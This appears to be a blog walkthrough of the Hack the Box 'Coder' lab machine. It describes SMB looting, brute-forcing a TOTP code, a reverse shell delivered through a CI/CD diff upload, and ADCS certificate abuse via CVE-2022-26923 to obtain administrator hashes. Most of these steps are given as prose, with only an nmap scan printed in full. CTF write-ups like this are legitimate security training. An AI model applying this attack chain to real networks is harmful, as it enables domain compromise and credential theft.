In this post, I would like to share a walkthrough of the Coder Machine from Hack the Box
This room will be considered an Insane machine on Hack the Box
What will you gain from the Coder machine?
For the user flag, you will need to analyze an SMB server containing a DotNet executable responsible for encryption, along with an encrypted file. Through reverse engineering of the executable, I aim to uncover a vulnerability enabling decryption of the file, thereby obtaining a KeePass Database and a corresponding file. Utilizing the file as a crucial key, I intend to access and retrieve information including domain details, credentials, and a backup for two-factor authentication associated with a TeamCity server. Further investigation involves reverse engineering of the Chrome plugin to comprehend the functionality of the backup process. Additionally, I plan to employ a brute force attack to ascertain the password and recover the Time-based One-Time Password (TOTP) seed. With this knowledge and the acquired credentials, I aim to access the server and initiate an upload of a modified version that executes as part of a Continuous Integration/Continuous Deployment (CI/CD) pipeline
As for the root flag, you need to exploit CVE-2022-26923 on Coder machine that involves the registration of a counterfeit computer equipped with a malicious DNS hostname. This deceptive setup is aimed at deceiving ADCS (Active Directory Certificate Services) into perceiving the counterfeit machine as the Domain Controller (DC). Once this ruse is successful, I can extract the hashes associated with the domain, ultimately gaining access to a shell with administrator privileges
For those who want to learan or improve CyberSecurity skills especially Red Teaming and Blue Team, You can use the link https://affiliate.hackthebox.com/gnfp67dzy7p0 to support me
Academy link can be found https://affiliate.hackthebox.com/wanmohdariffwanmohdrosdi6259vv
Information Gathering on Coder Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
┌─[darknite@parrot]─[~/Document/htb/Coder]
└──╼ $nmap -sC -sV 10.10.11.207 -oA initial
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-04 07:44 EDT
Nmap scan report for 10.10.11.207
Host is up (0.16s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-04 19:04:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: coder.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-05-04T19:04:50+00:00; +7h18m47s from scanner time.
| ssl-cert: Subject: commonName=dc01.coder.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc01.coder.htb
| Not valid before: 2022-06-30T04:24:26
|_Not valid after: 2023-06-30T04:24:26
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
| tls-alpn:
|_ http/1.1
|_ssl-date: 2023-05-04T19:04:50+00:00; +7h18m48s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=default-ssl/organizationName=HTB/stateOrProvinceName=CA/countryName=US
| Not valid before: 2022-11-04T17:25:43
|_Not valid after: 2032-11-01T17:25:43
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: coder.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-05-04T19:04:50+00:00; +7h18m48s from scanner time.
| ssl-cert: Subject: commonName=dc01.coder.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc01.coder.htb
| Not valid before: 2022-06-30T04:24:26
|_Not valid after: 2023-06-30T04:24:26
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: coder.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-05-04T19:04:50+00:00; +7h18m47s from scanner time.
| ssl-cert: Subject: commonName=dc01.coder.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc01.coder.htb
| Not valid before: 2022-06-30T04:24:26
|_Not valid after: 2023-06-30T04:24:26
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: coder.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-05-04T19:04:51+00:00; +7h18m47s from scanner time.
| ssl-cert: Subject: commonName=dc01.coder.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc01.coder.htb
| Not valid before: 2022-06-30T04:24:26
|_Not valid after: 2023-06-30T04:24:26
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-05-04T19:04:44
|_ start_date: N/A
|_clock-skew: mean: 7h18m47s, deviation: 0s, median: 7h18m46s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.63 seconds
Let’s access the website interface
However, the website interface only shows a page that normally indicates the server is using IIS
SMB enumeration
We managed to see a few shares that we can look into but Development shares caught my attention.
There are two files stored in the Temporary Projects directory.
Let’s download the file into our attacker’s machine.
Keepass tools
In this activity, we will be using KeePassXC tools that run on the Linux Operating System.
sudo apt install keepassxc
We can use the command above to install the tools on our attacker’s machine
We managed to retrieve some useful credentials that we can use to login to the dashboard.
As a result, let’s enter the credentials that we found earlier.
Sadly, we are required to enter a “Two-Factor Authentication” code to get a dashboard.
Let’s brute the 2fa code by using ffuf script
After a while, we managed to get the 6-digit code and try to validate the code
Boom! At last, we managed to see the dashboard
We should be creating the diff file format that contains the code as shown above.
Sadly, it’s not working as i planned
After a long of troubleshooting, i managed to find the issues and resolve them so that the file would work
Finally, it works as I planned
Let’s start our nc listener
We should be trying to upload our nc64.exe into the victim’s machine
Therefore, let’s start our Python HTTP server
At last, the upload process is a success.
Boom! We managed to retrieve a reverse shell connection back to us.
We managed to see the file that we executed on the current directory.
There are a lot of diff files that we can analyze further
Inside the file, we managed to locate some useful information such as enc.txt and key.key file
The file will contain the information above.
For Linux machines, we can use the command above to obtain the password of a certain user.
Looking back into the diff file that we analyzed previously, i did notice some usernames that we might use for escalation.
We can read the user flag by typing the “type user.txt” command
Escalate to Root Privileges Access on Coder Machine
Firstly, we are required to install Certipy version 4.4.0
After that, we should be executing the command above to obtain some information
We should export the template to our JSON file as shown above.
As a result, let’s download the JSON file into our machine so that it’s easier to modify than on the victim’s machine.
By default, the file will look something as shown above.
Therefore, let’s modify some key information such as msPKI-Certificate-Name-Flag and msPKI-Enrollment-Flag as shown above.
Let’s upload the modification JSON file into the victim’s machine
Let’s execute the command shown above
At last, we have been providing the vulnerabilities where Erron Black can enroll which means the template will allow anyone to authenticate.
As a result, let’s create the pfx certificate which we can use it for privileges escalate later
Let’s update the ntpdate on our machine.
Boom! We have managed to retrieve the administrator’s hashes
Finally, we managed to access the machine via evil-winrm using the administrator’s hashes that we found earlier.
We can read the root flag by typing the command “type root.txt”
No responses yet